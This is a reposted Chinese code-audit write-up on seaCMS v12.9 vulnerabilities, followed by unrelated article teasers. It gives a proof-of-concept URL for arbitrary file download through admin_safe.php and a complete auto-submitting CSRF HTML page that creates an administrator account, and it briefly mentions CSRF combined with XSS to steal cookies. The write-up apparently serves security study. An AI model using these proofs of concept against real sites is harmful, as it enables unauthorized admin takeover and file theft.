自学内容网 自学内容网
自学内容网 > 正文

seaCMS v12.9代码审计学习(下半)

🕗 发布于 2024-10-15 17:04 php  web安全  代码审计  网络安全  

文章目录

admin/admin_safe.php任意文件下载

在admin_safe.php文件下有着这么一段代码,他的作用时检查action的值是否为download,如果为download那么将你传入的文件直接打印给你。这里并未对用户传入的file变量做任何过滤。
在这里插入图片描述
poc:http://www.seacms/ozcf6u/admin_safe.php?action=scan&file=E:/phpStudy_64/phpstudy_pro/WWW/SeaCMS_12.9/Upload/ozcf6u/admin_safe.php,即可下载任意目录下的文件。
在这里插入图片描述

CSRF 添加管理员账户

poc:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://www.seacms/ozcf6u/admin_manager.php?action=add" method="POST">
      <input type="hidden" name="username" value="test" />
      <input type="hidden" name="pwd" value="test" />
      <input type="hidden" name="pwd2" value="test" />
      <input type="hidden" name="groupid" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

成功效果图:
在这里插入图片描述

CSRF配合XSS弹cookie

很多漏洞网上很多师傅都大多复现过,大同小异,这里就不赘述了。


原文地址:https://blog.csdn.net/qq_62612080/article/details/142502177

免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!

相关文章

  • 天通卫星电话|移动手持终端|5G军工手持终端|全星魅

    在当今这个信息瞬息万变的时代,通信技术作为连接世界的桥梁,其重要性不言而喻。随着科技的飞速发展,传统的通信手段已难以满足人们在极端环境或偏远地区的通信需求。于是,一款集高科技与实用性于一身的双模卫星电

    阅读更多2024-10-16
  • 【大模型系列】Qwen2-VL(2024.10)

    Qwen团队开源了Qwen2-VL系列模型,支持多语言图像文本理解、代码/数学推理、视频分析、实时聊天、代理等。支持动态分辨率输入,并在训练过程中引入了2D-RoPE,从而使模型更好的捕获不同空间尺度

    阅读更多2024-10-16
  • Java之IO流详解

    Java 的输入输出(IO)系统是 Java 编程的核心部分之一,用于处理数据的读写操作。Java 提供了一套强大的 API 来处理不同类型的 IO 操作,包括文件读写、网络传输、内存操作等。

    阅读更多2024-10-16
  • MySQL 安装和基本使用

    MySQL 的特性MySQL 是基于开源协议发布的,可以免费使用,也可以基于源码进行二次开发。MySQL 使用标准 SQL 语言进行管理。MySQL 可以运行于多个系统上,具有跨平台特性,并且支持多种

    阅读更多2024-10-16
  • 10.15学习

    变量的类型定义了它可以存储的值的范围。例如, int 类型可以存储的整数范围通常在 -2,147,483,648 到 2,147,483,647 之间(具体范围取决于系统的位数),而 float

    阅读更多2024-10-16
  • 每日OJ题_WY3小易的升级之路_数学模拟_C++_Java

    每日OJ题_WY3小易的升级之路_数学模拟_C++_Java(本题的能力值的累加分两种情况,一种是直接相加bi,一种是累加当前能力值于bi的​​​​​​​最大公约数。最大公约数可以通过碾转相除法求得:

    阅读更多2024-10-16
  • Vue3嵌套导航相对路径问题

    可以参考下面的a标签,也是这样跳转的,个人觉得在当前路径是http://localhost:5173/news的时候,访问相对路径detail,就相当于一个文件夹是http://localhost:5

    阅读更多2024-10-16
  • 5款实用的文字转语音工具,简单几步完成转换,你值得拥有(收藏)

    不知道大家对文字语音转换软件了解有多少,随着互联网科技的发展,现在很多文字转语音软件已逐渐融入我们的日常生活。有需要的小伙伴们快点接着往下看吧!以上就是小编给大家分享的几个文字语音转换工具了,我们可以

    阅读更多2024-10-16
  • anatraf抓包分析仪与网络故障排除

    抓包分析仪是一种能够捕获、记录并分析网络数据包的设备或软件工具,它能够提供实时的网络流量分析,并帮助管理员深入了解网络的运作机制。抓包分析仪可以帮助企业在日常的网络运维中,识别出可能影响网络性能的瓶颈

    阅读更多2024-10-16
  • C++运算出现整型溢出

    答案也是编不过的,要想编过,需要将b改成long类型,这是因为运算时会发生隐式类型转换,a的int类型会转换为更长的long,从而暂存值一直是long,不会溢出。请记住,c语言没有赋值,只有表达式,右

    阅读更多2024-10-16
自学内容网
Copyright © 2015-2024